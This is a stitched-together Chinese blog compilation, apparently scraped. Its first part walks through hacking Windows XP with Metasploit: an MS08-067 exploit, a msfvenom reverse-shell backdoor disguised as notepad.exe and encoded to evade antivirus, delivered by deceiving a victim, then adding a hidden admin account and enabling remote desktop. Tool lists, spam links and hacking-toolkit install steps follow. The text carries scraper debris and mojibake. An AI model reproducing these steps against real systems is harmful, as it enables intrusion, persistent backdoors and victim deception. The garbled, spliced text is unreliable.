我使用Kali Linux的IP地址是192.168.0.112;在同一局域網內有一臺運行Windows XP(192.168.0.108)的測試電腦。javascript
本文演示怎麼使用Metasploit入侵windows xp sp3。css
啓動msfconsole:html
# msfconsole
選擇一個漏洞:java
msf > search platform: windows xp sp3
exploit/windows/smb/ms08_067_netapi是08年發現的漏洞,等級Great。python
查看某個漏洞的詳細信息;包含使用方法、支持的平臺等等,很是有幫助:linux
msf > info exploit/windows/smb/ms08_067_netapi
依次執行以下命令:nginx
msf > use exploit/windows/smb/ms08_067_netapi
> set payload windows/meterpreter/bind_tcp > set RHOST 192.168.0.108 (設置目標主機IP地址) > exploit
若是目標主機有這個漏洞的話,你就能夠控制它了;若是沒有,嘗試使用其餘漏洞。git
[*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP SP3 - Service Pack 3 - lang:Chinese [*] Selected Target: Windows XP SP3 Chinese (AlwaysOn NK) [*] Attempting to trigger the vulnerability... [*] Sending stage (751104 bytes) to 192.168.0.108 [*] Meterpreter session 1 opened (192.168.0.1:41614 -> 192.168.0.108:4444) at 2016-04-15 17:29:32 meterpreter >
如今你就能夠控制目標主機了,能夠截屏、錄音、視頻、下載文件、殺進程等等;使用help查看能夠執行的命令。github
原理:在Kali Linux上生成後門程序,而後把它發送給受害者,欺騙受害者運行(使用郵件、圖片等等)。難點是須要過殺毒軟件和防火牆。web
生成後門程序:
我把後門程序隱藏到記事本程序中:notepad.exe
查看Kali Linux的IP:ifconfig(192.168.0.112)
建立後門程序,my_backdoor.exe:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4445 -x NOTEPAD.EXE -e x86/jmp_call_additive -i 4 -k -f exe > my_backdoor.exe
上面命令使用加密試圖躲過殺毒軟件,可是,不要指望它能夠生效。使用man msfvenom查看幫助。
把它發送到Windows系統,並運行;若是不能運行換用其餘加密方式。
啓動msfconsole:
# msfconsole
use exploit/multi/handler set LHOST 192.168.0.112 set LPORT 4445 set payload windows/meterpreter/reverse_tcp show options exploit
等待受害者啓動後門程序。
OK,入侵成功。
Windows服務器系統包括一個全面、集成的基礎結構,旨在知足開發人員和信息技術(IT)專業人員的要求。此係統設計用於運行特定的程序和解決方案,藉助這些程序和解決方案,信息工做人員能夠快速便捷地獲取、分析和共享信息。入侵者對Windows服務器系統的攻擊主要是針對IIS服務器和組網協議的攻擊。
入侵Windows服務器的流程
kaili linux 百度百科
其預裝了許多試驗工具,包括nmap 、Wireshark 、John the Ripper ,以及Aircrack-ng.[2] 用戶可經過硬盤、live CD或live USB運行Kali Linux。
Metasploit 百度百科
Metasploit是一個免費的、可下載的框架,經過它能夠很容易地獲取、開發並對計算機軟件漏洞實施攻擊。它自己附帶數百個已知軟件漏洞的專業級漏洞攻擊工具。
1.0 熟悉虛擬機vmware的相關知識,由於本環境是在VM中進行的,須要安裝kaili linux和windows xp,以及設計虛擬機網絡,其能夠參考文章:vmware14.0知識點手冊.
2.0 計算機網絡相關知識點。
2.1 vmware的虛擬網絡
與物理交換機類似,虛擬交換機也能將網絡鏈接組件鏈接在一塊兒。虛擬交換機又稱爲虛擬網絡,其名稱爲VMnet0、VMnet一、VMnet2,以此類推。有少許虛擬交換機會默認映射到特定網絡。
橋接模式網絡鏈接
橋接模式網絡鏈接經過使用主機系統上的網絡適配器將虛擬機鏈接到網絡
NAT 模式網絡鏈接
使用 NAT 模式網絡時,虛擬機在外部網絡中沒必要具備本身的 IP 地址。主機系統上會創建單獨的專用網絡。
僅主機模式網絡鏈接
僅主機模式網絡鏈接可建立徹底包含在主機中的網絡。
ip地址,由《net-id,host-id》二部分組成。根據網絡號的位數,把ip劃分爲A,B,C,D,E幾大類,其中A類(0,127),B類(128,191),C類(192,223)
3.0 VMWare虛擬機提供的橋接、nat和主機模式的區別
因此本次試驗的虛擬機網絡採用橋接方式,因此主要介紹下橋接。
bridged(橋接模式)
在這種模式下,VMWare虛擬出來的操做系統就像是局域網中的一臺獨立的主機,它能夠訪問網內任何一臺機器。
在橋接模式下,由於是獨立的主機系統,那麼就須要爲虛擬系統配置IP、子網掩碼。
使用橋接模式的虛擬系統和宿主機器的關係,就像鏈接在同一個Hub上的兩臺電腦。想讓它們相互通信,你就須要爲虛擬系統配置IP地址和子網掩碼,不然就沒法通訊。並且還要和宿主機器處於同一網段,這樣虛擬系統才能和宿主機器進行通訊。
1.0 由於在vmware模擬kaili入侵windows xp因此要保證這二臺虛擬機能夠通訊,試驗的vmware採用橋接網絡,二臺虛擬機至關於獨立的主機,在vmware想要通訊,必須處於同一網段(就是網絡號要同樣),二臺主機設置kaili設置爲192.168.201.133,windows xp設置爲192.168.201.135,它們是C類ip,前3位是網絡號,都是192.168.201相同,能夠通訊,能夠採用ping命令進行。
2.0 爲了試驗效果明顯,最好關閉掉windows的防火牆,這樣入侵更容易,並且本身本來的主機把殺毒軟件也關閉了。
1.0 查看linux的ip地址
root@kali:~# ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.201.133 netmask 255.255.255.0 broadcast 192.168.201.255 inet6 fe80::20c:29ff:fecc:87cf prefixlen 64 scopeid 0x20<link> ether 00:0c:29:cc:87:cf txqueuelen 1000 (Ethernet) RX packets 30 bytes 2530 (2.4 KiB) RX errors 0 dropped 5 overruns 0 frame 0 TX packets 51 bytes 3303 (3.2 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 1000 (Local Loopback) RX packets 52 bytes 3756 (3.6 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 52 bytes 3756 (3.6 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
這裏能夠看出個人ip地址爲192.168.201.133。若是想要修改ip地址能夠採用 ifconfig eth0 192.168.201.136 命令
其中127.0.0.1 127.0.0.1是回送地址,指本地機,通常用來測試使用。回送地址(127.x.x.x)是本機回送地址(Loopback Address),即主機IP堆棧內部的IP地址,主要用於網絡軟件測試以及本地機進程間通訊,不管什麼程序,一旦使用回送地址發送數據,協議軟件當即返回,不進行任何網絡傳輸。
2.0 ping命令,測試linux和windows是否能夠通訊
root@kali:~# ping -c 2 192.168.201.135 PING 192.168.201.135 (192.168.201.135) 56(84) bytes of data. 64 bytes from 192.168.201.135: icmp_seq=1 ttl=128 time=13.5 ms 64 bytes from 192.168.201.135: icmp_seq=2 ttl=128 time=0.395 ms --- 192.168.201.135 ping statistics --- 2 packets transmitted, 2 received, 0% packet loss, time 1002ms rtt min/avg/max/mdev = 0.395/6.986/13.578/6.592 ms
linux的ping和windows有所不一樣,若是不設置次數會一直ping下去。
root@kali:~# ping Usage: ping [-aAbBdDfhLnOqrRUvV64] [-c count] [-i interval] [-I interface] [-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos] [-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option] [-w deadline] [-W timeout] [hop1 ...] destination
3.0 開啓SQL數據庫服務
root@kali:~# service postgresql start
4.0 終端執行msfconsole 命令
root@kali:~# msfconsole # cowsay++ ____________ < metasploit > ------------ \ ,__, \ (oo)____ (__) )\ ||--|| * =[ metasploit v4.16.6-dev ] + -- --=[ 1682 exploits - 964 auxiliary - 297 post ] + -- --=[ 498 payloads - 40 encoders - 10 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
使用help命令查看其參數和用法
msf > help
Core Commands
=============
Command Description
------- -----------
? Help menu
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
exit Exit the console
get Gets the value of a context-specific variable
getg Gets the value of a global variable
grep Grep the output of another command
help Help menu
history Show command history
irb Drop into irb scripting mode
load Load a framework plugin
quit Exit the console
route Route traffic through a session
save Saves the active datastores
sessions Dump session listings and display information about sessions set Sets a context-specific variable to a value setg Sets a global variable to a value sleep Do nothing for the specified number of seconds spool Write console output into a file as well the screen threads View and manipulate background threads unload Unload a framework plugin unset Unsets one or more context-specific variables unsetg Unsets one or more global variables version Show the framework and console library version numbers Module Commands =============== Command Description ------- ----------- advanced Displays advanced options for one or more modules back Move back from the current context edit Edit the current module with the preferred editor info Displays information about one or more modules loadpath Searches for and loads modules from a path options Displays global options or for one or more modules popm Pops the latest module off the stack and makes it active previous Sets the previously loaded module as the current module pushm Pushes the active or list of modules onto the module stack reload_all Reloads all modules from all defined module paths search Searches module names and descriptions show Displays modules of a given type, or all modules use Selects a module by name Job Commands ============ Command Description ------- ----------- handler Start a payload handler as job jobs Displays and manages jobs kill Kill a job rename_job Rename a job Resource Script Commands ======================== Command Description ------- ----------- makerc Save commands entered since start to a file resource Run the commands stored in a file Database Backend Commands ========================= Command Description ------- ----------- db_connect Connect to an existing database db_disconnect Disconnect from the current database instance db_export Export a file containing the contents of the database db_import Import a scan result file (filetype will be auto-detected) db_nmap Executes nmap and records the output automatically db_rebuild_cache Rebuilds the database-stored module cache db_status Show the current database status hosts List all hosts in the database loot List all loot in the database notes List all notes in the database services List all services in the database vulns List all vulnerabilities in the database workspace Switch between database workspaces Credentials Backend Commands ============================ Command Description ------- ----------- creds List all credentials in the database
5.0 運行search netapi命令搜索netapi,在metasploip框架中列出全部與netapi相關的漏洞利用代碼
msf > search netapi
Matching Modules
================
Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/smb/ms03_049_netapi 2003-11-11 good MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow exploit/windows/smb/ms06_040_netapi 2006-08-08 good MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow exploit/windows/smb/ms06_070_wkssvc 2006-11-14 manual MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption
能夠看到最後一個漏洞利用代碼的評級爲great,因此優先使用ms08_067_netapi。
show tagrgets能夠查看攻擊平臺
show opinions能夠查看攻擊須要設置那些參數
show payloads能夠查看使用的攻擊載荷
6.0使用 use exploit/windows/smb/ms08_067_netapi ,設置參數
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 192.168.201.135 rhost => 192.168.201.135 msf exploit(ms08_067_netapi) > check [+] 192.168.201.135:445 The target is vulnerable. msf exploit(ms08_067_netapi) > set lhost 192.168.201.133 lhost => 192.168.201.133 msf exploit(ms08_067_netapi) > set target 34 msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp_allports payload => windows/meterpreter/reverse_tcp_allports msf exploit(ms08_067_netapi) > exploit [*] Started reverse TCP handler on 192.168.201.133:1 [*] 192.168.201.135:445 - Attempting to trigger the vulnerability... [*] Sending stage (179267 bytes) to 192.168.201.135 [*] Meterpreter session 1 opened (192.168.201.133:1 -> 192.168.201.135:1031) at 2017-10-27 23:03:20 +0800
set rhost是設置目標主機ip
setset lhost設置本機ip
set payload設置攻擊載荷
exploit,是實行攻擊,若是成功,會獲得一個session,可使用meterpreter模板進一步提取
7.0 輸入shell,獲取受控zhuji的shel,我這裏是windows的dos。
meterpreter > shell
Process 1968 created. Channel 1 created. Microsoft Windows XP [錕芥本 5.1.2600] (C) 錕斤拷權錕斤拷錕斤拷 1985-2001 Microsoft Corp. C:\WINDOWS\system32>net user ztg 123456 /add net user ztg 123456 /add 錕絞夥拷錕窖撅拷錕斤拷錕節★拷 錕斤拷錕斤拷錕斤拷 NET HELPMSG 2224 錕皆夥拷錕矯革拷錕斤拷錕僥幫拷錕斤拷錕斤拷 C:\WINDOWS\system32>net localgroup administrators ztg /add net localgroup administrators ztg /add 錕斤拷錕斤拷系統錕斤拷錕斤拷 1378錕斤拷 錕斤拷錕斤拷錕絞夥拷錕斤拷錕斤拷錕角憋拷錕斤拷錕斤拷錕僥籌拷員錕斤拷 C:\WINDOWS\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 錕斤拷錕斤拷錕繳癸拷錕斤拷錕斤拷 C:\WINDOWS\system32>netstat -an netstat -an Active Connections Proto Local Address Foreign Address State TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING TCP 127.0.0.1:1026 0.0.0.0:0 LISTENING TCP 192.168.201.135:139 0.0.0.0:0 LISTENING TCP 192.168.201.135:1031 192.168.201.133:1 ESTABLISHED UDP 0.0.0.0:445 *:* UDP 0.0.0.0:500 *:* UDP 0.0.0.0:4500 *:* UDP 127.0.0.1:123 *:* UDP 127.0.0.1:1025 *:* UDP 127.0.0.1:1900 *:* UDP 192.168.201.135:123 *:* UDP 192.168.201.135:137 *:* UDP 192.168.201.135:138 *:* UDP 192.168.201.135:1900 *:* C:\WINDOWS\system32>ipconfig -all ipconfig -all Windows IP Configuration Host Name . . . . . . . . . . . . : dflx Primary Dns Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Unknown IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No Ethernet adapter 錕斤拷錕斤拷錕斤拷錕斤拷: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter Physical Address. . . . . . . . . : 00-0C-29-04-23-53 Dhcp Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 192.168.201.135 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . :
進入windows界面,dos大神能夠暢通無阻了,不過若是喜歡windows界面,能夠安裝上面的方法,進行操做,在遠程桌面。
net user ztg 123456 /add
添加一個用戶名爲ztg,密碼123456
C:\WINDOWS\system32>net localgroup administrators ztg /add net localgroup administrators ztg /add
把ztg添加到管理員用戶組
C:\WINDOWS\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
是手動開啓3389(遠程桌面鏈接端口)
1. METASPLOIT
在應對網絡滲透問題時,MetaSploit很是好用。由於MetaSploit是目前最早進的黑客工具之一,它擁有一整套先進的滲透測試工具。該工具主要面向的是Linux操做系統,但也有Windows和Mac版本。
2. NMAP
NMAP,全名Network Mapper,是一個功能強大的開源工具,主要用於網絡安全審計和網絡搜尋。目前,該工具被普遍應用於查找有關目標網絡和服務器設備的信息以及其餘網絡漏洞信息。大多數網絡管理員將其用於網絡清單、管理服務升級計劃以及監控主機或服務正常運行等任務。Nmap適用於Linux、Windows和Mac。
3. NESSUS
NESSUS,全名Remote Security Scanner(遠程安全掃描程序),是一款主要用於漏洞掃描的遠程安全掃描工具。它是全球超過75,000家組織中最受歡迎的漏洞掃描程序。到如今爲止,世界上已有愈來愈多的組織意識到了Nessus在審覈關鍵業務、企業設備和應用程序上的巨大做用。
4. WIRESHARK
Wireshark是一個免費的開源數據包分析器。它主要用於網絡故障排除、分析和軟件及通訊協議的開發。最爲關鍵的一點是,該工具容許使用者捕獲和交互式瀏覽網絡幀的內容,該功能使它成爲了最受歡迎的黑客工具之一。Wireshark適用於Linux和Windows操做系統。
5.Social-Engineer Toolkit
Social-Engineer Toolkit(社會工程師工具包)是一款基於Python的社交工程滲透測試高級框架。它提供了製做多種類型社會工程攻擊的組件,如憑據獲取、魚叉式網絡釣魚攻擊、短信欺騙、網絡釣魚電子郵件等等。目前,Social-Engineer Toolkit僅適用於Linux系統。
--------------------------
1. Nmap
Nmap(Network Mapper)是一款很是著名的、用來掃描端口和繪製網絡的、開源免費的黑客工具,它是一個基於控制檯的工具,另外方便使用,還有一個帶有GUI的版本Zenmap。Nmap被世界各地的安全專業人員用於繪製網絡空間,檢查開放的端口,管理服務的升級計劃,監控主機或服務的正常運行時間。
nmap主要用於網絡發現和執行安全審計。它使用原始IP數據包以創造性的方式來肯定哪些主機在網絡上可用,收集主機提供了哪些服務及其相關信息(應用程序名稱和版本),使用的是什麼操做系統,目標主機的過濾器/防火牆容許什麼類型、什麼版本的數據包穿過。
2. Metasploit
Metasploit是一個漏洞利用工具,能夠用來執行各類各樣的任務,它是網絡安全專業人員和白帽黑客必不可少的工具。同時它是最著名的一個開源框架,可用於開發和執行鍼對遠程目標機器的POC的工具。Metasploit本質上是爲用戶提供關於已知的安全漏洞的關鍵信息,幫助制定滲透測試、系統測試計劃、漏洞利用的策略和方法。
3. John the Ripper
John the Ripper是一個受歡迎的密碼破解滲透測試工具,最經常使用於進行字典攻擊。John the Ripper以文本字符串的樣本(也稱爲「字典表」,包括經常使用和複雜的組合密碼)爲基礎,並以與待破解密碼一樣的方式(包括加密算法和密鑰)進行加密,並輸出加密字符串,與真正密碼進行比較。該工具還能夠用於對字典庫進行各類變形。
另外一個和John the Ripper相似的工具是THC Hydra(九頭蛇)。John the Ripper和THC之間惟一的區別是,John the Ripper是一個離線的密碼破解器,而九頭蛇是一個「在線」的破解工具。
4. THC Hydra
THC Hydra是一個很是受歡迎的密碼破解工具,而且有一個很是活躍和經驗豐富的開發團隊在維護,支持Windows,Linux,Free BSD,Solaris和OS X等操做系統。THC Hydra是一個快速穩定的網絡登陸攻擊工具,它將使用字典或暴力攻擊來嘗試針對登陸頁面的各類密碼和登陸組合。當你須要強力破解遠程認證服務時,THC Hydra經常是個不二選擇工具。它能夠對超過50個協議執行高效的字典攻擊,包括telnet、FTP、HTTP、HTTPS、SMB、多種類型的數據庫,等等。您能夠輕鬆添加模塊到該工具中,以此加強功能。
5. OWASP Zed
OWASP Zed代理攻擊(簡稱:ZAP)是一個很是流行的Web應用程序滲透測試工具,用於發現應用漏洞。它既能夠被具備豐富經驗的安全專家所用,同時對於開發人員和功能測試人員來講也是很是理想的測試工具箱。
ZAP是一個流行的工具,由於它也有不少的支持者,而且OWASP社區也是一個爲那些網絡安全工做人員提供優秀資源的社區。ZAP提供自動掃描器以及其餘各類工具,用於發現安全漏洞。理解和精通這個工具備利於你在滲透測試領域的職業生涯提高。
6. Wireshark
Wireshark是一個很是流行的網絡協議分析器工具,它能夠用於檢查辦公網絡或家庭網絡中的各類東西。您能夠實時捕獲數據包並分析數據包以找到與網絡相關的各類信息。該工具支持Windows,Linux,OS X,Solaris,FreeBSD和其餘平臺。
Wireshark已經高度發達,它包括過濾器,彩色標註等細節功能,讓用戶深刻了解網絡流量和檢查每一個數據包。若是你想成爲一個滲透測試相關工做或者做爲一個網絡安全從業者,學習如何使用Wireshark是必不可缺的。
7. Aircrack-ng
Aircrack-ng是一個無線攻擊工具,其之全部上榜是由於它具備強有力的無線網絡密碼的破解能力。這是一個用於802.11協議簇中WEP協議和WPA-PSK協議的密鑰破解工具,它只要在監控模式下抓取足夠的數據包,就能夠恢復密鑰。咱們知道aircrack-ng提供標準的FMS攻擊和優化了的Korek攻擊,結合PTW攻擊可以使他們的攻擊更有效。對於那些對無線攻擊感興趣的人來講,這是一個強烈推薦的工具。無線審計和滲透測試,學習Aircrack是必不可少的。
8. Maltego
Maltego是數字取證工具,爲企業網絡或局域網絡提供一個總體的網絡運行狀況和網絡威脅畫像。Maltego核心功能是分析真實世界中可觸及的公開互聯網信息之間的關係,包括「踩點」互聯網基礎設施以及收集擁有這些設施的企業組織和我的信息。
Maltego提供一個範圍普遍的圖形化界面,經過聚合信息可即時準確地看到各個對象之間的關係,這使得咱們能夠看到隱藏的關聯,即便它們是三重或四重的分離關係。
9. Cain and Abel
Cain&Abel是微軟操做系統的密碼復原工具,經過嗅探網絡它可輕易地復原各類密碼,使用字典、暴力、密碼分析破解加密密碼,記錄VoIP通話記錄,解碼加密的密碼,恢復無線網絡密鑰,發現緩存密碼、分析路由協議。
開發Cain&Abel的本意,是但願它能對網絡管理員、教師、安全顧問/專業人員、法醫工做人員、安全軟件供應商、專業滲透測試人員等提供幫助。
10. Nikto Website Vulnerability Scanner
Nikto是另外一個經典的黑客工具,它是一個開源的(GPL)Web服務器掃描工具,綜合掃描web服務器中的潛在危險的文件、CGI、版本檢查、特定版本的問題、服務器配置項。被掃描項目和插件能夠進行自動更新。
Nikto也能夠檢查服務器配置項,好比多索引文件的存在,HTTP服務選項,該工具還可標識已安裝的Web服務器和Web應用程序。Nikto也算是半個IDS工具了,因此它是在進行白帽滲透測試或白盒滲透測試時是很是有用的。
黑客工具也不只限於以上討論的那些,不一樣我的或團隊都有不一樣的偏好。然而,這些都是被專業人士推薦的最受歡迎的工具。並且,全部這些工具都被集成在用於滲透測試的Linux發行版,如Kali Linux或BackBox系統,所以你們都極力推薦你安裝一個合適的、可以自動更新工具庫的、集成衆多黑客工具的Linux工具箱了。
http://www.lnluqu.cn/
http://www.025invest.cn/
http://www.wx-detian.cn/
http://www.xintravel.cn/
http://www.fenghuicaifu.cn/
http://www.chinaytbzw.cn/
http://www.sydire.cn/
http://www.jnymkj.cn/
http://www.metrel-china.cn/
http://www.hongheqiche.cn/
http://www.zazhiku.cn/
http://www.yz-hysl.cn/
http://www.gutiangelun.cn/
http://www.lnjjpm.cn/
http://www.touraround.cn/
---------------------
在真實滲透環境下每每須要一個穩定、安全、可隨時操做的環境,家中的電腦不能一直開着,並且還有解決公網IP的問題,這時候咱們每每須要一臺vps,可是市面上的vps每每並不支持安裝kali系統,只有某些較貴的KVM構架vps能夠不太穩定的安裝kali系統,其餘linux系統支持的滲透測試軟體也並不全面,因而今天我爲你們介紹一款能夠直接在常見Ubuntu設備上安裝所有kali工具集的程序katoolin。
首先確保你的Python版本大於2.7
python --version
安裝git
apt-get install git
而後便開始安裝
sudo su
git clone https://github.com/LionSec/katoolin.git && cp katoolin/katoolin.py /usr/bin/katoolin
chmod +x /usr/bin/katoolin #給予權限
sudo katoolin #打開katoolin
以後輸入
1查看軟件庫
2查看軟件分類
3安裝經典菜單通知
4安裝kali菜單
5幫助
咱們先輸入1查看軟件庫
再輸入1添加軟件源完成後輸入2更新源,輸入back返回上級或gohome返回主頁
接下來在主界面選擇2 View Categories
輸入對應數字查看軟件列表並安裝,或者直接輸入0安裝所有工具。
後面主界面的3和4用來安裝菜單這裏不作過多介紹。
另外注意 執行apt-get update前必須先在katoolin內刪除軟件源
這樣很簡單便安裝了kali的所有工具集,是否是很方便呢。
開個msfconsole
Tool-X是一個由python編寫的用於安裝kali linux黑客工具的安裝程序。在Tool-X的幫助下,你能夠任意在Root或非Root的Android設備中安裝黑客工具。Tool-X中爲咱們提供了近251款黑客工具,這些工具可供termux app和GNURoot Debian終端使用,你能夠經過單擊來安裝任何你須要的工具。Tool-X專爲Termux和GNURoot Debian終端而設計。現已支持Ubuntu。
輸入 0:表示安裝全部工具
輸入 1:顯示全部可用工具,並經過編號選擇想要安裝的工具
輸入 2:顯示工具類別
輸入 3:用於在termux中安裝操做系統
輸入 4:更新Tool-X
輸入 5:關於咱們
輸入 x:退出
當前支持系統:
Android
Ubuntu
打開termux app並鍵入如下命令。
apt update pkg install git git clone https://github.com/Rajkumrdusad/Tool-X.git cd Tool-X chmod +x install.aex sh install.aex 若是沒法正常執行請鍵入 ./install.aex
如今,Tool-X已成功安裝。鍵入Tool-X運行Tool-X。
如今你能夠在終端的任何位置,經過鍵入Tool-X來打開Tool-X。
打開GNURoot Debian app並輸入如下命令。
cd && git clone https://github.com/Rajkumrdusad/Tool-X.git cd Tool-X chmod +x install.aex sh install.aex 若是沒法正常執行請鍵入 ./install.aex
如今,Tool-X已成功安裝。鍵入Tool-X運行Tool-X。
如今你能夠在終端的任何位置,經過鍵入Tool-X來打開Tool-X。
sudo apt-get Update sudo apt-get install git sudo git clone https://github.com/Rajkumrdusad/Tool-X.git cd Tool-X chmod +x install.aex sudo sh install.aex 或 ./install.aex
如今,Tool-X已成功安裝。鍵入Tool-X運行Tool-X。
如今你能夠在終端的任何位置,經過鍵入Tool-X來打開Tool-X。最後提醒你們一句,請勿將該工具用於任何非法目的!